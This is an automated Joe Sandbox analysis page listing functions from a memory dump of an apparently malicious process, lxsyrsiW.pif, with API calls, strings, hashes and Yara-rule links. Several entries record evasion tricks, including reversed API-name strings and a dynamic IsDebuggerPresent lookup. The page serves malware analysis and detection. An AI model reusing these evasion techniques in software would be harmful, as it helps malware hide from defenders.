Part of subcall function 02E4AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E4AD59
Part of subcall function 02E4AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E4AD7D
Part of subcall function 02E4AD3C: GetModuleFileNameA.KERNEL32(02E40000,?,00000105), ref: 02E4AD98
Part of subcall function 02E4AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E4AE2E

CharToOemA.USER32(?,?), ref: 02E4AEFB
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02E4AF18
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E4AF1E
GetStdHandle.KERNEL32(000000F4,02E4AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E4AF33
WriteFile.KERNEL32(00000000,000000F4,02E4AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E4AF39
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02E4AF5B
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02E4AF71

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 48171cbb7792d1a4ff955705c26d374eb67a930372b4f02db4caac3c0332a9a8
Instruction ID: 68e789a7ed89549deebb044c3439c5610cbb922af7b72907ffefcef3817613ae
Opcode Fuzzy Hash: 48171cbb7792d1a4ff955705c26d374eb67a930372b4f02db4caac3c0332a9a8
Instruction Fuzzy Hash: 521151F25C4304ABD200FB95EC85F9B77ADAB45710F809A25B744D61E0DE74E9448B62

Function 02E4E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02E4E625
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02E4E641
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02E4E67A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02E4E6F7
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02E4E710
VariantCopy.OLEAUT32(?,00000000), ref: 02E4E745

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: b0ff75799b380bb929b5a2d7f23d8938f7bef3277fb022d7546eb450d13166d7
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: 4B510775A412299BCB22DF58DC80BD9B3BDBF49304F0495E5FA08E7201DA30AF818F64

Function 02E43598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E435BA
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02E43609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E435ED
RegCloseKey.ADVAPI32(?,02E43610,00000000,?,00000004,00000000,02E43609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E43603

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 02E435B0
FPUMaskValue, xrefs: 02E435E4

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 9baa5fdc96c6fd843f860a0177df2a176a75da4aa346c09aeb65f4256c6845aa
Instruction ID: e7af962e898d2fdb628a52dc3bf1d10ff73629e3eaaf5a0296955f77ae5bf38d
Opcode Fuzzy Hash: 9baa5fdc96c6fd843f860a0177df2a176a75da4aa346c09aeb65f4256c6845aa
Instruction Fuzzy Hash: 2B01B5799C0219BAEB11DFA1AD02FBA77ECD708B00F6045E1FE04D6680EA74A950DA59

Function 02E58274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
GetProcAddress.KERNEL32(?,?), ref: 02E582D9

Strings

sserddAcorPteG, xrefs: 02E5828F
Kernel32, xrefs: 02E582BC

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: 2ee59613ffa50eac00aabd654b461e934ead71184a7f28eb224cba16cd278841
Instruction ID: 7ab625b7bac050c9eab02fdba7dbcfaed43003a36cedae4801f33481e4349b25
Opcode Fuzzy Hash: 2ee59613ffa50eac00aabd654b461e934ead71184a7f28eb224cba16cd278841
Instruction Fuzzy Hash: BC0144757D4304AFEB04EBA5EC41F5EBBAEEB49B00F61D460BC00D7640DA74A941CE64

Function 02E4AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02E4AAE7,?,?,00000000), ref: 02E4AA68

Part of subcall function 02E4A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E4A7E2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02E4AAE7,?,?,00000000), ref: 02E4AA98
EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02E4AAA3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02E4AAE7,?,?,00000000), ref: 02E4AAC1
EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02E4AACC

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 1de87a62425527763e84225aecb2f65a7474382d94ae9b8469236c705c3c8179
Instruction ID: 86085ba5ed903cbee9988ba29ae5bde67a0bcc84ea4d8d04b8d5791c874e140e
Opcode Fuzzy Hash: 1de87a62425527763e84225aecb2f65a7474382d94ae9b8469236c705c3c8179
Instruction Fuzzy Hash: E001D4F12C02446AFA11EB64FD21B5B725DDB86720F51E1B1F500A6BC0DE759E009A64

Function 02E4AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02E4ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02E4AB2F

Part of subcall function 02E4A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E4A7E2

Strings

ggg, xrefs: 02E4AC15
yyyy, xrefs: 02E4AC25
eeee, xrefs: 02E4AC3E

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 494b12f72b4083f1bcabec0443e4c57775fbdf0e77e96d41ea344e19ffd706c9
Instruction ID: 9dff2b8b4702ddf60cae1a032cc8f73994b540e3b25d7779fe8f91a9029b48f9
Opcode Fuzzy Hash: 494b12f72b4083f1bcabec0443e4c57775fbdf0e77e96d41ea344e19ffd706c9
Instruction Fuzzy Hash: 9341E2717C45044B9B11EE78B8B47FEB2EBDB86224B51F535F442D3784EE28DA02CA21

Function 02E581CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A

Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9

GetModuleHandleA.KERNELBASE(?), ref: 02E5821E

Strings

KernelBASE, xrefs: 02E58205
AeldnaHeludoMteG, xrefs: 02E581E5

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 57e3c957c8e8a76e343a10a89ef10ac824ac3d049453cd6b72687b8f6bef62f5
Instruction ID: 23fa3ba61e8a96d9413e459e8632e1cfcabd8a07f19791c7138a98c44f9cbe73
Opcode Fuzzy Hash: 57e3c957c8e8a76e343a10a89ef10ac824ac3d049453cd6b72687b8f6bef62f5
Instruction Fuzzy Hash: 5BF09674AD4704AFEB00EFA9ED0195DBBEDE74A7007A1D460BC04D3610DA30AE50CD64

Function 02E5F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02E5FAEB,UacInitialize,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,Initialize), ref: 02E5F6EE
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E5F700

Strings

KernelBase, xrefs: 02E5F6E9
IsDebuggerPresent, xrefs: 02E5F6FA

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: b3439a36e52e2c2326c578a3bab6e08389fa59aa7eaade4413c90e741b46dd41
Instruction ID: 551111a986692af82c0d28dd7ce611f475f0d1d3817ffa31fe573618287b098b
Opcode Fuzzy Hash: b3439a36e52e2c2326c578a3bab6e08389fa59aa7eaade4413c90e741b46dd41
Instruction Fuzzy Hash: 7DD012E17F136019FE0073F42CC4C19038C855752D720BE60F822C6492E9A688195014

Function 02E4C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02E6D10B,00000000,02E6D11E), ref: 02E4C47A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02E4C48B

Strings

kernel32.dll, xrefs: 02E4C475
GetDiskFreeSpaceExA, xrefs: 02E4C485

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 7983fc3b37fd28ebf98345e80d0040f8c595121828ab34e21ad89ed8d4b9f2dc
Instruction ID: e3a86595fd230e3a6b67826bd642345029d25f5cdd9e6380eba0c7631fa4cb2a
Opcode Fuzzy Hash: 7983fc3b37fd28ebf98345e80d0040f8c595121828ab34e21ad89ed8d4b9f2dc
Instruction Fuzzy Hash: A8D05EE4AC13145EE600ABB27588A3326988308354BA8F866F4024F142EF7298508F95

Function 02E4E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02E4E297
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02E4E2B3
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02E4E32A
VariantClear.OLEAUT32(?), ref: 02E4E353

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 55a0bf7317df59d1100071a63060cf6ca267d325648f98d0b82dcbbdf6511067
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: BD411875A412299FCB62DF58DC90BD9B3BDBF49304F0492D5EA4CA7211DA30AF808F64

Function 02E4AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E4AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E4AD7D
GetModuleFileNameA.KERNEL32(02E40000,?,00000105), ref: 02E4AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E4AE2E

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 177f8a67da5b1a62d6d12b74cff9f2ee4a7c4aa3af20937254d63a990fca58f4
Instruction ID: 6aeb09ec8ec189f6d44cad1fc9692eae09227b827cf7eca156ee45543eb6c52a
Opcode Fuzzy Hash: 177f8a67da5b1a62d6d12b74cff9f2ee4a7c4aa3af20937254d63a990fca58f4
Instruction Fuzzy Hash: 02413970A802589BDB21DB68EC84BDAB7FDAB48314F4490F6A548E7341DB70AF84CF50

Function 02E4AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E4AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E4AD7D
GetModuleFileNameA.KERNEL32(02E40000,?,00000105), ref: 02E4AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E4AE2E

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: f0ae08714b553b327aac5225418df49c9cddce6ef11d420807fd9565cc2d59fe
Instruction ID: 21fea448b4b4534288fdda132632f64f4d60cc7ad8a97b4c7699fc2cded37046
Opcode Fuzzy Hash: f0ae08714b553b327aac5225418df49c9cddce6ef11d420807fd9565cc2d59fe
Instruction Fuzzy Hash: E6415870A802589BDB21DB68EC84BDAB7FDAB48314F4494F6A548E7341DB70AF84CF50

Function 02E41C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ffc183049a350f4cadde1aef15bb0c15c3094a757791cbca4a1fb1fc0e3026
Instruction ID: a2ac8ed280d08d892f13229dd964995fbd0fa5a9435137d29f3ed9c7b01ac161
Opcode Fuzzy Hash: 08ffc183049a350f4cadde1aef15bb0c15c3094a757791cbca4a1fb1fc0e3026
Instruction Fuzzy Hash: 7CA1E9A67906000BDF189A7DFC843AD73829BC5369F19D27EE51DCF381EF6489C68650

Function 02E494EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02E495DA), ref: 02E49572
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02E495DA), ref: 02E49578

Strings

yyyy, xrefs: 02E4954D

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 45f79ba778805e376cde291cd9535a7694b7436dd4f24551ca44a4a31ee09923
Instruction ID: f253da68c8be1da98a108ab28e6508a25df246c604f714c754b606a5c9f25b98
Opcode Fuzzy Hash: 45f79ba778805e376cde291cd9535a7694b7436dd4f24551ca44a4a31ee09923
Instruction Fuzzy Hash: 59218D71A402589FDB10DFA8E881BAEB3B9EF09700F5190A5F905E7281DF349E40CBA5

Function 02E58338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E

Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E583C2), ref: 02E583A4

Strings

Kernel32, xrefs: 02E58383
FlushInstructionCache, xrefs: 02E58351

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: d4b64b9bc19982e820335e6a0c358cccf2c5b9dc3c3f795209be26927ff4d550
Instruction ID: 4f71530b6a8b8ececc916459783e1c4850ba3523e55a6dedf3ec13c7660e0f56
Opcode Fuzzy Hash: d4b64b9bc19982e820335e6a0c358cccf2c5b9dc3c3f795209be26927ff4d550
Instruction Fuzzy Hash: 880144717D0304AFE700EE95EC41B5A779DE748700F51A460BD04D6640D674AD908E24

Function 02E5AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02E5AF58
IsBadWritePtr.KERNEL32(?,00000004), ref: 02E5AF88
IsBadReadPtr.KERNEL32(?,00000008), ref: 02E5AFA7
IsBadReadPtr.KERNEL32(?,00000004), ref: 02E5AFB3

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
Instruction ID: 582068c286482cf08e5afecce5c4ca81813e883b4aa2864567016e92e5250c6f
Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
Instruction Fuzzy Hash: D021A5B26906299FDB10DF66DC80BAE73AAEF44315F00D661FD1497384D734E81186B0

Analysis Process: lxsyrsiW.pifPID: 3192, Parent PID: 8084COMMON

Execution Graph

